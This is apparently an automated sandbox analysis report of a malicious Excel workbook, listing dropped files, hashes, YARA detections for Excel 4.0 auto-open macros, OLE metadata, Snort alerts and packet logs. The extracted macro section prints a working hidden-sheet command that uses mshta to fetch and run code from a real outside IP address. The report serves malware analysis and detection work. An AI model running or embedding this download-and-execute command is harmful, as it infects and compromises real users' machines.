                                                                                                                                Entropy (8bit):3.4042783261155494
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:768:a8rk3hbdlylKsgqopeJBWhZFGkE+cL2NdAJS6ypP3:a8rk3hbdlylKsgqopeJBWhZFGkE+cL2D
                                                                                                                                MD5:C96E48F1A43DB6DC70AA5605F71594CC
                                                                                                                                SHA1:AC619CBB44E70D7874DE9D21B8A21531E16332DB
                                                                                                                                SHA-256:99D8FE70EC2F87FA1FE76C69B6908B67A112F3ADFB091DADA1448D851327AA06
                                                                                                                                SHA-512:5C5C6857397BD5870D9DF74A178718272051A31438421513695D3F8E369B5F16C354692013393E3E0E98D983BA759207524CAD2DB47FF57832E4B71CC632E758
                                                                                                                                Malicious:false
                                                                                                                                Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms. (copy)

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):8016
                                                                                                                                Entropy (8bit):3.5854729870494317
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:96:chQCcMq+qvsqvJCwo1z8hQCcMq+qvsEHyqvJCworbzIyYbHmUVhxlUV/A2:ciHo1z8irHnorbzIwUVhqA2
                                                                                                                                MD5:CD203EFE0B1A8B1AEF2124D87E35C848
                                                                                                                                SHA1:12375A75397607E932FC651A2EC9685FB9EA9CD3
                                                                                                                                SHA-256:5D7ADEB9ECF8330A092B9745201EE03CB4710F79E016BFA22EF68B680906B9AE
                                                                                                                                SHA-512:4D8DEEDF50A6BF0BC0B0DBBD21B6E63EB90DE7F7F006090F542E27B60D1BD72D57A1CBEBCFB1DA0A99D97D8B26EE3CFC35D9ECDAC5295588F599FAAC0B0525AC
                                                                                                                                Malicious:false
                                                                                                                                Preview:...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......S"...Programs..f.......:...S".*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.

                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\PSS5MSE6ODEJ7ODZGM4G.temp

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):8016
                                                                                                                                Entropy (8bit):3.5854729870494317
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:96:chQCcMq+qvsqvJCwo1z8hQCcMq+qvsEHyqvJCworbzIyYbHmUVhxlUV/A2:ciHo1z8irHnorbzIwUVhqA2
                                                                                                                                MD5:CD203EFE0B1A8B1AEF2124D87E35C848
                                                                                                                                SHA1:12375A75397607E932FC651A2EC9685FB9EA9CD3
                                                                                                                                SHA-256:5D7ADEB9ECF8330A092B9745201EE03CB4710F79E016BFA22EF68B680906B9AE
                                                                                                                                SHA-512:4D8DEEDF50A6BF0BC0B0DBBD21B6E63EB90DE7F7F006090F542E27B60D1BD72D57A1CBEBCFB1DA0A99D97D8B26EE3CFC35D9ECDAC5295588F599FAAC0B0525AC
                                                                                                                                Malicious:false
                                                                                                                                Preview:...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......S"...Programs..f.......:...S".*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.

                                                                                                                                C:\Users\user\Desktop\NZW-010122 BNUV-280122.xls

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Author: xXx, Last Saved By: xXx, Name of Creating Application: Microsoft Excel, Create Time/Date: Thu Jan 27 23:12:32 2022, Last Saved Time/Date: Fri Jan 28 17:08:40 2022, Security: 0
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):92160
                                                                                                                                Entropy (8bit):6.883394588152737
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:1536:D8rk3hbdlylKsgqopeJBWhZFGkE+cL2NdAE6yHBEL70drpFk0GX/s2C6ORQYDBhi:Dgk3hbdlylKsgqopeJBWhZFGkE+cL2N+
                                                                                                                                MD5:CF9D56615629886C63B6760CBF8242ED
                                                                                                                                SHA1:543866E16DE3AEA9EB1CE485BC56ABF965FCD6F6
                                                                                                                                SHA-256:7EDBB5371754682C7ABA4F056B7CB56DBC05C0B2D1D823727E386180B065347F
                                                                                                                                SHA-512:4A76D9595AFF7B265B922C625E8E64946068F20C531CBE3101CF20CBE61EB67EA1E8911C93FE653B6EC9C1F5DFC59B855E988EC773D84E977E78E14CEFBA542E
                                                                                                                                Malicious:false
                                                                                                                                Yara Hits:
                                                                                                                                • Rule: SUSP_Excel4Macro_AutoOpen, Description: Detects Excel4 macro use with auto open / close, Source: C:\Users\user\Desktop\NZW-010122 BNUV-280122.xls, Author: John Lambert @JohnLaTwC
                                                                                                                                • Rule: JoeSecurity_XlsWithMacro4, Description: Yara detected Xls With Macro 4.0, Source: C:\Users\user\Desktop\NZW-010122 BNUV-280122.xls, Author: Joe Security
                                                                                                                                Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................ZO..........................\.p....user B.....a.........=.............................................=........p.08.......X.@...........".......................1................h..C.a.l.i.b.r.i.1................h..C.a.l.i.b.r.i.1................h..C.a.l.i.b.r.i.1................h..C.a.l.i.b.r.i.1................h..C.a.l.i.b.r.i.1................h..C.a.l.i.b.r.i.1...........

                                                                                                                                C:\Users\user\Desktop\~$NZW-010122 BNUV-280122.xlsm

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):165
                                                                                                                                Entropy (8bit):1.4377382811115937
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:vZ/FFDJw2fV:vBFFGS
                                                                                                                                MD5:797869BB881CFBCDAC2064F92B26E46F
                                                                                                                                SHA1:61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
                                                                                                                                SHA-256:D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
                                                                                                                                SHA-512:1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
                                                                                                                                Malicious:true
                                                                                                                                Preview:.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                                                                                                                                C:\Windows\SysWOW64\Svccveo\pcrxj.oyh (copy)

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):548864
                                                                                                                                Entropy (8bit):6.980528809006344
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12288:B2AavzUBPSczbeeTLjvRyMwWd3DYr6i64/:OUBPSczbeeTnvFZDWA
                                                                                                                                MD5:8BD62A28212A7FB5A6F44AA4E8C2A9ED
                                                                                                                                SHA1:EE143CDC53AA8D42DED5A590718748BFF889058D
                                                                                                                                SHA-256:CE03150C100640C640AC5C02B24658C61527654DCAEEFA64FFE3DF24CE92E81D
                                                                                                                                SHA-512:1DB5553F5E4F2F9082B8933D50520F26F6AD77EA3E5FAD9ECA2C7C96A8E191D106608150C8ADC3278180FC3675EB41B35C0F0AA5AAD28C8C667E9B4A69A176B8
                                                                                                                                Malicious:false
                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......hs.a,..2,..2,..2...2&..2...27..2,..2...2...26..2...2...2...2...2...2-..2...2-..2...2-..2Rich,..2................PE..L...>..a...........!.....P...................`......................................................................@-..R...4...........PV......................0N......................................@............`..........@....................text...9E.......P.................. ..`.rdata.......`.......`..............@..@.data....e...0...0...0..............@....rsrc...PV.......`...`..............@..@.reloc..b...........................@..B........................................................................................................................................................................................................................................................................................................................

                                                                                                                                Static File Info

                                                                                                                                General

                                                                                                                                File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Author: xXx, Last Saved By: xXx, Name of Creating Application: Microsoft Excel, Create Time/Date: Thu Jan 27 23:12:32 2022, Last Saved Time/Date: Fri Jan 28 17:08:40 2022, Security: 0
                                                                                                                                Entropy (8bit):6.842397695869262
                                                                                                                                TrID:
                                                                                                                                • Microsoft Excel sheet (30009/1) 78.94%
                                                                                                                                • Generic OLE2 / Multistream Compound File (8008/1) 21.06%
                                                                                                                                File name:NZW-010122 BNUV-280122.xlsm
                                                                                                                                File size:92988
                                                                                                                                MD5:acbaebd7bb2090b795b481d48453b3fa
                                                                                                                                SHA1:a06b2a6d2a15d070262144854ea4ace65cb71892
                                                                                                                                SHA256:c81e4045b744f1e7aed46015f3f3a1de5078b95d908b966a56724965fb5b91e2
                                                                                                                                SHA512:b203906fe5cb2a5bddf15ec7bf7e13164819f497e56979a4a9e764015e6d747ed1a90d46be11b30805b5091c80dfb876a0f69a1dbbbbbebcbfad7e89ddd2df24
                                                                                                                                SSDEEP:1536:u8rk3hbdlylKsgqopeJBWhZFGkE+cL2NdAE6yHBEL70drpFk0GX/s2C6ORQYDBhQ:ugk3hbdlylKsgqopeJBWhZFGkE+cL2N8
                                                                                                                                File Content Preview:........................>......................................................................................................................................................................................................................................

                                                                                                                                File Icon

                                                                                                                                Icon Hash:e4e2aa8aa4bcbcac

                                                                                                                                Static OLE Info

                                                                                                                                General

                                                                                                                                Document Type:OLE
                                                                                                                                Number of OLE Files:1

                                                                                                                                OLE File "NZW-010122 BNUV-280122.xlsm"

                                                                                                                                Indicators
                                                                                                                                Has Summary Info:True
                                                                                                                                Application Name:Microsoft Excel
                                                                                                                                Encrypted Document:False
                                                                                                                                Contains Word Document Stream:False
                                                                                                                                Contains Workbook/Book Stream:True
                                                                                                                                Contains PowerPoint Document Stream:False
                                                                                                                                Contains Visio Document Stream:False
                                                                                                                                Contains ObjectPool Stream:
                                                                                                                                Flash Objects Count:
                                                                                                                                Contains VBA Macros:True
                                                                                                                                Summary
                                                                                                                                Code Page:1251
                                                                                                                                Author:xXx
                                                                                                                                Last Saved By:xXx
                                                                                                                                Create Time:2022-01-27 23:12:32
                                                                                                                                Last Saved Time:2022-01-28 17:08:40
                                                                                                                                Creating Application:Microsoft Excel
                                                                                                                                Security:0
                                                                                                                                Document Summary
                                                                                                                                Document Code Page:1251
                                                                                                                                Thumbnail Scaling Desired:False
                                                                                                                                Company:
                                                                                                                                Contains Dirty Links:False
                                                                                                                                Shared Document:False
                                                                                                                                Changed Hyperlinks:False
                                                                                                                                Application Version:1048576

                                                                                                                                Streams

                                                                                                                                Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
                                                                                                                                General
                                                                                                                                Stream Path:\x5DocumentSummaryInformation
                                                                                                                                File Type:data
                                                                                                                                Stream Size:4096
                                                                                                                                Entropy:0.339840493791
                                                                                                                                Base64 Encoded:False
                                                                                                                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . l . . . . . . . t . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . P r o t e c t . . . . . S h e e t 1 . . . . . L I N K O . . . . . . . . . . . . . . . . . W o r k s h e e t s .
                                                                                                                                Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 fc 00 00 00 09 00 00 00 01 00 00 00 50 00 00 00 0f 00 00 00 58 00 00 00 17 00 00 00 64 00 00 00 0b 00 00 00 6c 00 00 00 10 00 00 00 74 00 00 00 13 00 00 00 7c 00 00 00 16 00 00 00 84 00 00 00 0d 00 00 00 8c 00 00 00 0c 00 00 00 b5 00 00 00
                                                                                                                                Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096
                                                                                                                                General
                                                                                                                                Stream Path:\x5SummaryInformation
                                                                                                                                File Type:data
                                                                                                                                Stream Size:4096
                                                                                                                                Entropy:0.259989164271
                                                                                                                                Base64 Encoded:False
                                                                                                                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x X x . . . . . . . . . x X x . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . 0 . \\ . . . . @ . . . . . . i . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 04 00 00 00
                                                                                                                                Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 81698
                                                                                                                                General
                                                                                                                                Stream Path:Workbook
                                                                                                                                File Type:Applesoft BASIC program data, first line number 16
                                                                                                                                Stream Size:81698
                                                                                                                                Entropy:7.36680951422
                                                                                                                                Base64 Encoded:True
                                                                                                                                Data ASCII:. . . . . . . . Z O . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . x X x B . . . . . a . . . . . . . . . = . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . . . . p . 0 8 . . . . . . . X . @ . . . . . . . . . . . " . . . . . . .
                                                                                                                                Data Raw:09 08 10 00 00 06 05 00 5a 4f cd 07 c9 00 02 00 06 08 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 03 00 00 78 58 78 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

                                                                                                                                Macro 4.0 Code

                                                                                                                                Name:LINKO
                                                                                                                                Type:3
                                                                                                                                Final:False
                                                                                                                                Visible:False
                                                                                                                                Protected:False
                                                                                                                                LINKO3False0Falsepost2,2,=EXEC("CMD.EXE /c mshta http://91.240.118.172/cc/vv/fe.html")4,2,=HALT()
                                                                                                                                Name:LINKO
                                                                                                                                Type:3
                                                                                                                                Final:False
                                                                                                                                Visible:False
                                                                                                                                Protected:False
                                                                                                                                LINKO3False0Falsepre2,2,=EXEC("CMD.EXE /c mshta http://91.240.118.172/cc/vv/fe.html")4,2,=HALT()

                                                                                                                                Network Behavior

                                                                                                                                Snort IDS Alerts

                                                                                                                                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                01/28/22-20:39:50.419922TCP2034631ET TROJAN Maldoc Activity (set)4916880192.168.2.2291.240.118.172
                                                                                                                                01/28/22-20:39:50.609763TCP1201ATTACK-RESPONSES 403 Forbidden8049169213.186.33.4192.168.2.22

                                                                                                                                Network Port Distribution

                                                                                                                                TCP Packets

                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                Jan 28, 2022 20:39:45.800431013 CET4916780192.168.2.2291.240.118.172
                                                                                                                                Jan 28, 2022 20:39:45.861833096 CET804916791.240.118.172192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:45.861934900 CET4916780192.168.2.2291.240.118.172
                                                                                                                                Jan 28, 2022 20:39:45.874831915 CET4916780192.168.2.2291.240.118.172
                                                                                                                                Jan 28, 2022 20:39:45.936130047 CET804916791.240.118.172192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:45.936727047 CET804916791.240.118.172192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:45.936794043 CET804916791.240.118.172192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:45.936815977 CET804916791.240.118.172192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:45.936834097 CET804916791.240.118.172192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:45.936846018 CET804916791.240.118.172192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:45.936857939 CET804916791.240.118.172192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:45.936872005 CET804916791.240.118.172192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:45.936885118 CET804916791.240.118.172192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:45.936897993 CET804916791.240.118.172192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:45.936907053 CET804916791.240.118.172192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:45.936968088 CET4916780192.168.2.2291.240.118.172
                                                                                                                                Jan 28, 2022 20:39:45.936986923 CET4916780192.168.2.2291.240.118.172
                                                                                                                                Jan 28, 2022 20:39:45.936990023 CET4916780192.168.2.2291.240.118.172
                                                                                                                                Jan 28, 2022 20:39:45.936992884 CET4916780192.168.2.2291.240.118.172
                                                                                                                                Jan 28, 2022 20:39:45.937810898 CET4916780192.168.2.2291.240.118.172
                                                                                                                                Jan 28, 2022 20:39:45.951591969 CET4916780192.168.2.2291.240.118.172
                                                                                                                                Jan 28, 2022 20:39:50.356193066 CET4916880192.168.2.2291.240.118.172
                                                                                                                                Jan 28, 2022 20:39:50.417546988 CET804916891.240.118.172192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:50.417622089 CET4916880192.168.2.2291.240.118.172
                                                                                                                                Jan 28, 2022 20:39:50.419922113 CET4916880192.168.2.2291.240.118.172
                                                                                                                                Jan 28, 2022 20:39:50.481091022 CET804916891.240.118.172192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:50.481677055 CET804916891.240.118.172192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:50.481697083 CET804916891.240.118.172192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:50.481745005 CET4916880192.168.2.2291.240.118.172
                                                                                                                                Jan 28, 2022 20:39:50.554142952 CET4916980192.168.2.22213.186.33.4
                                                                                                                                Jan 28, 2022 20:39:50.581336021 CET8049169213.186.33.4192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:50.581402063 CET4916980192.168.2.22213.186.33.4
                                                                                                                                Jan 28, 2022 20:39:50.581624985 CET4916980192.168.2.22213.186.33.4
                                                                                                                                Jan 28, 2022 20:39:50.609762907 CET8049169213.186.33.4192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:50.714458942 CET4917080192.168.2.2251.81.152.36
                                                                                                                                Jan 28, 2022 20:39:50.810955048 CET4916980192.168.2.22213.186.33.4
                                                                                                                                Jan 28, 2022 20:39:50.877417088 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:50.878236055 CET4917080192.168.2.2251.81.152.36
                                                                                                                                Jan 28, 2022 20:39:50.878462076 CET4917080192.168.2.2251.81.152.36
                                                                                                                                Jan 28, 2022 20:39:51.040703058 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:51.046953917 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:51.046987057 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:51.047005892 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:51.047024012 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:51.047043085 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:51.047044039 CET4917080192.168.2.2251.81.152.36
                                                                                                                                Jan 28, 2022 20:39:51.047061920 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:51.047071934 CET4917080192.168.2.2251.81.152.36
                                                                                                                                Jan 28, 2022 20:39:51.047081947 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:51.047101974 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:51.047108889 CET4917080192.168.2.2251.81.152.36
                                                                                                                                Jan 28, 2022 20:39:51.047121048 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:51.047142029 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:51.047154903 CET4917080192.168.2.2251.81.152.36
                                                                                                                                Jan 28, 2022 20:39:51.209480047 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:51.209511042 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:51.209527969 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:51.209543943 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:51.209558964 CET4917080192.168.2.2251.81.152.36
                                                                                                                                Jan 28, 2022 20:39:51.209561110 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:51.209578037 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:51.209578991 CET4917080192.168.2.2251.81.152.36
                                                                                                                                Jan 28, 2022 20:39:51.209594011 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:51.209611893 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:51.209613085 CET4917080192.168.2.2251.81.152.36
                                                                                                                                Jan 28, 2022 20:39:51.209628105 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:51.209646940 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:51.209654093 CET4917080192.168.2.2251.81.152.36
                                                                                                                                Jan 28, 2022 20:39:51.209670067 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:51.209678888 CET4917080192.168.2.2251.81.152.36
                                                                                                                                Jan 28, 2022 20:39:51.209691048 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:51.209712982 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:51.209718943 CET4917080192.168.2.2251.81.152.36
                                                                                                                                Jan 28, 2022 20:39:51.209736109 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:51.209758043 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:51.209775925 CET4917080192.168.2.2251.81.152.36
                                                                                                                                Jan 28, 2022 20:39:51.209779978 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:51.209803104 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:51.209825039 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:51.209832907 CET4917080192.168.2.2251.81.152.36
                                                                                                                                Jan 28, 2022 20:39:51.372209072 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:51.372241020 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:51.372258902 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:51.372273922 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:51.372291088 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:51.372308016 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:51.372323990 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:51.372334957 CET4917080192.168.2.2251.81.152.36
                                                                                                                                Jan 28, 2022 20:39:51.372339964 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:51.372355938 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:51.372358084 CET4917080192.168.2.2251.81.152.36
                                                                                                                                Jan 28, 2022 20:39:51.372360945 CET4917080192.168.2.2251.81.152.36
                                                                                                                                Jan 28, 2022 20:39:51.372373104 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:51.372390985 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:51.372406006 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:51.372409105 CET4917080192.168.2.2251.81.152.36
                                                                                                                                Jan 28, 2022 20:39:51.372421980 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:51.372437000 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:51.372452021 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:51.372453928 CET4917080192.168.2.2251.81.152.36
                                                                                                                                Jan 28, 2022 20:39:51.372467995 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:51.372483015 CET4917080192.168.2.2251.81.152.36
                                                                                                                                Jan 28, 2022 20:39:51.372620106 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:51.372642994 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:51.372661114 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:51.372675896 CET4917080192.168.2.2251.81.152.36
                                                                                                                                Jan 28, 2022 20:39:51.372678995 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:51.372711897 CET4917080192.168.2.2251.81.152.36
                                                                                                                                Jan 28, 2022 20:39:51.372773886 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:51.372795105 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:51.372814894 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:51.372833967 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:51.372843027 CET4917080192.168.2.2251.81.152.36
                                                                                                                                Jan 28, 2022 20:39:51.372854948 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:51.372873068 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:51.372916937 CET4917080192.168.2.2251.81.152.36
                                                                                                                                Jan 28, 2022 20:39:51.372987032 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:51.373008966 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:51.373029947 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:51.373038054 CET4917080192.168.2.2251.81.152.36
                                                                                                                                Jan 28, 2022 20:39:51.373049021 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:51.373111963 CET804917051.81.152.36192.168.2.22
                                                                                                                                Jan 28, 2022 20:39:51.373155117 CET4917080192.168.2.2251.81.152.36
